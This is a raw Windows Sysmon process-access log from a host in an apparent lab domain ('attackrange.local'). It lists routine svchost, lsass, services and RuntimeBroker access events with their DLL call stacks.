13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.899{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+1969|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.899{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\ncbservice.dll+165c|c:\windows\system32\ncbservice.dll+227a|c:\windows\system32\ncbservice.dll+205e|c:\windows\system32\ncbservice.dll+1bdb|c:\windows\system32\ncbservice.dll+181b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.899{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+17cf|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.899{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.836{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.836{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.836{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.836{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.821{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.789{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.774{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.758{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.742{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.742{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 